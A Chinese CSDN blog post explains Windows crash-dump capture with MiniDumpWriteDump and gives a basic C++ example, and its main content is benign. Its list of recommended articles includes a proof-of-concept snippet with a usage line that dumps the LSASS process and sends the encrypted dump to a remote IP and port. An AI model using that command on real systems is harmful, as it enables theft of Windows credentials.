【操作系统】Windows平台捕获崩溃现场底层原理,附代码亲测MiniDumpWriteDump

最新推荐文章于 2024-09-12 20:58:18 发布
最新推荐文章于 2024-09-12 20:58:18 发布
阅读量352 收藏 4
点赞数 8
分类专栏: C/C++ 操作系统 # Windows 文章标签: linux windows 服务器 c++ 开发语言 汇编 visualstudio
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37286579/article/details/139393895
版权
C/C++ 同时被 3 个专栏收录
92 篇文章 4 订阅
订阅专栏
Windows
31 篇文章 0 订阅
订阅专栏
操作系统
27 篇文章 1 订阅
订阅专栏

MiniDumpWriteDump 是一个Windows API函数,它属于DbgHelp.dll库,用于生成程序崩溃时的内存转储文件(MiniDump)。这个函数是Windows平台下用于捕获程序崩溃时的内存状态的常用方法之一。以下是MiniDumpWriteDump函数的原理和工作流程:

  1. 函数调用
    当程序崩溃时,操作系统会捕获到一个异常信号(如EXCEPTION_ACCESS_VIOLATIONEXCEPTION_INT_DIVIDE_BY_ZERO等),并根据配置决定是否生成转储文件。如果配置允许,操作系统会调用MiniDumpWriteDump函数。

  2. 参数准备
    MiniDumpWriteDump函数需要几个关键参数:

    • hProcess:表示要转储的进程的句柄。
    • ProcessId:表示要转储的进程的ID。
    • hFile:表示要写入转储数据的文件句柄。
    • DumpType:指定转储文件的类型,例如MiniDumpNormalMiniDumpWithFullMemoryMiniDumpWithHandleData等。
    • ExceptionParam:指向异常信息的指针,如果是因为异常而生成转储文件,这个参数会提供异常的详细信息。
    • UserStreamParam:指向用户流信息的指针,可以用来添加额外的用户定义信息到转储文件中。
    • CallbackParam:指向回调函数的指针,如果提供了回调函数,它会在转储过程中被调用。

  3. 内存转储
    MiniDumpWriteDump函数会遍历进程的内存空间,根据DumpType参数的设置,决定哪些内存区域需要被转储。例如,如果设置了MiniDumpWithFullMemory,则会转储整个进程的内存空间;如果设置了MiniDumpWithHandleData,则会转储进程的句柄信息。

  4. 文件写入
    转储的数据会被写入到由hFile参数指定的文件中。这个文件就是最终生成的MiniDump文件,它包含了崩溃时的内存快照、寄存器状态、线程信息等。

  5. 结束转储
    当所有需要的数据都被写入文件后,MiniDumpWriteDump函数会返回,转储过程结束。

  6. 后续处理
    生成的MiniDump文件可以被开发者使用调试工具(如WinDbg)打开和分析,以帮助诊断程序崩溃的原因。

MiniDumpWriteDump函数是Windows平台上进行程序崩溃分析的重要工具,它允许开发者在程序崩溃时捕获到程序的完整状态,从而进行深入的调试和问题定位。

#include <windows.h>
#include <dbghelp.h>

void GenerateMiniDump(const char* dumpPath) {
    HANDLE hProcess = GetCurrentProcess();
    HANDLE hFile = CreateFile(dumpPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return;
    }

    MINIDUMP_EXCEPTION_INFORMATION mei;
    mei.ThreadId = GetCurrentThreadId();
    mei.ExceptionPointers = NULL;
    mei.ClientPointers = FALSE;

    MINIDUMP_USER_STREAM_INFORMATION musi;
    musi.UserStreamCount = 0;
    musi.UserStreamArray = NULL;

    MINIDUMP_CALLBACK_INFORMATION mci;
    mci.CallbackRoutine = NULL;
    mci.CallbackParam = NULL;

    BOOL result = MiniDumpWriteDump(hProcess, GetCurrentProcessId(), hFile, MiniDumpNormal, &mei, &musi, &mci);
    if (result) {
        // Dump file generated successfully
    } else {
        // Error occurred while generating the dump file
    }

    CloseHandle(hFile);
}
Michael_Good
关注
专栏目录
使用MiniDumpWriteDump API 来生成程序的Dump
zskylark的专栏
11-17 1026
<br /><br />MiniDumpWriteDump是MS DbgHelp.dll 中一个API, 用于导出当前运行的程序的Dump. 这个dll程序系统中就有, 但是很多软件, 都在自己的安装目录下保存了这个.dll的最新的版本.<br />为了测试这个API, 参考网上一些资料, 写了一个简单的C++ 程序. 目的是当有异常发生的时候, 自动生成Dump文件供之后的分析. 有了Dump文件, 我们就可以使用WinDBG等调试器来分析异常发生时的情况. 其实这个功能很多软件都有, 比如QQ, 魔兽世
使用API自己实现Crash时Dump
weixin_33762130的博客
04-11 315
程序在运行时,难免会有一些异常情况发生,特别是在条件不容许去挂调试器的时候,如何快速的定位错误的方法就显得很重要。 日志一直都是一种很重要的定位错误的方法,出得好的日志可以方便程序员快速的定位问题所在。但日志有时也显不足: 日志有时只能定位大体错误范围,却无法确认问题所在,比如程序抓到一个未知的异常。 程序有时没有机会来出日志,或者能出日志的时候已经无法获得和错误相关的信息,比如程序崩溃...
minidump详细介绍
chentao1206的专栏
03-31 3333
Effective minidump  简介 在过去几年里,崩溃转储(crash dump)成为了调试工作的一个重要部分。如果软件在客户现场或者测试实验室发生故障,最有价值的解决方式是能够创建一个故障瞬间的应用程序状态镜像,然后可以在开发者的机器上通过调试器进行分析。第一代的crash dump通常被称为“全用户转储(full user dump)”,它包含了进程的虚拟内存的全
DmpUse MiniDumpWriteDump
11-18
SetUnhandledExceptionFilter
MiniDumpWriteDump
weixin_30273931的博客
10-12 420
MiniDumpWriteDump 转载于:https://www.cnblogs.com/chunyou128/archive/2012/10/12/2721689.html
VC++ MiniDumpWriteDump 保存程序的DUMP调试文件信息,类似于 Linux 下面的 core 调试信息文件。
liulilittle的博客
10-17 371
WIN32K结构化异常筛选器函数实现:类似 catch when 的语法效果。
081105,产生release的PDB信息,MiniDumpWriteDump
kh
12-10 1880
  源自:http://msdn.microsoft.com/en-us/library/bb204861.aspx。 以前一直想在release下同时产生PDB文件,修改setting后,都会导致exe的尺寸增加不少,所以一直没有使用。 发现在link里添加 /opt:ref /OPT:ICF 后生成PDB和不生成PDB的exe文件大小差很小。   MiniDumpWriteDum
MiniDumpWriteDump函数生成dmp文件
cxd1314520的博客
12-02 640
MiniDumpWriteDump函数生成dmp文件
windows下使用minidump获取和调试崩溃信息
langresser的专栏
02-27 5832
非常简单和实用的功能,先上代码 1、使用minidump获取和打印崩溃信息 #include #include #pragma comment(lib, "DbgHelp.lib") void CreateDumpFile(LPCWSTR lpstrDumpFilePathName, EXCEPTION_POINTERS *pException) { // 创建Dump文件
Windows系统下的Qt处理崩溃异常的Dump库,生成Dump文件.zip
09-23
"Windows系统下的Qt处理崩溃异常的Dump库,生成Dump文件" 这个标题涉及到的是在Windows操作系统中使用Qt框架进行程序开发时,如何处理程序崩溃异常并生成内存转储(Dump)文件的技术。Dump文件是程序运行时内存状态...
MiniDumpWriteDumpPoC:MiniDumpWriteDump行为修改钩子
05-11
MiniDumpWriteDumpPoC MiniDumpWriteDump行为修改钩子 阅读我们博客中的完整文章: 这是一个函数挂钩,允许访问MiniDumpWriteDump生成的缓冲区,然后再将其插入磁盘。 一旦访问,它将加密缓冲区并通过套接字将其发送到给定的主机。 汇编 提供了完整的VS解决方案。 只是编译它。 用法 首先,将服务器设置为在接收主机上进行侦听: python3 serv.py <PORT> python3 serv.py 1234 .\minidumppoc.exe <LSASS> <WRITE> <EXFIL> [<HOST> <PORT>] [<EXPORT>] minidump.exe 696 1 1 '192.168.1.10' 1234 "c:\test.dmp" 收到整个文件后,关
Windows进程崩溃问题的定位方法
09-03
Windows操作系统中,进程崩溃问题定位是开发者和系统管理员常见的工作内容。当应用程序意外终止时,定位和解决崩溃问题对于保证软件稳定性和用户体验至关重要。本文主要介绍了Windows环境下,使用nstd工具对进程...
Windows程序崩溃后通过代码产生完整dump
08-29
Windows操作系统中,当应用程序发生异常导致崩溃时,通常会丢失很多关键的调试信息。而通过生成dump文件,我们可以捕获程序崩溃时的状态,包括内存布局、线程信息、堆栈回溯等,这对于后期分析和解决问题至关重要...
基于开源CrashRpt与微软开源Detours技术深度改造的异常捕获库分享
热门推荐
dvlinker的技术专栏
04-22 1万+
基于开源CrashRpt与微软开源Detours技术深度改造的异常捕获库分享。
【Qt】引入MiniDumpWriteDump 收集崩溃镜像
突围
09-14 1153
参考程序崩溃时,调用DbgHelp生成minidump文件 Qt 客户端在windows上可以使用。 加依赖库会找不到,直接代码里引用 //使用 MiniDumpWriteDump 需要引用 DbgHelp.h 并添加动态库 dbhelper.lib 到程序中。 #pragma comment(lib, "dbghelp.lib") MiniDumpWriteDump 头文件 #include <dbghelp.h> 收集 #include <windo..
写入的dump文件为0kb (1、MiniDumpWriteDump 简单理解)
Ma_Hong_Kai的博客
12-18 7552
1、了解下MiniDumpWriteDump MiniDumpWriteDump (vs2008) MSDN ImageHlp.h 文件 // …… 4647-4657 BOOL WINAPI MiniDumpWriteDump( IN HANDLE hProcess, IN DWORD ProcessId, IN HANDLE hFile, IN...
Linux】:信号与信号产生
最新发布
Yikefore的博客
09-12 924
信号的基本概念、对信号的理解、信号的多种产生方式以及核心转储的详细介绍!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值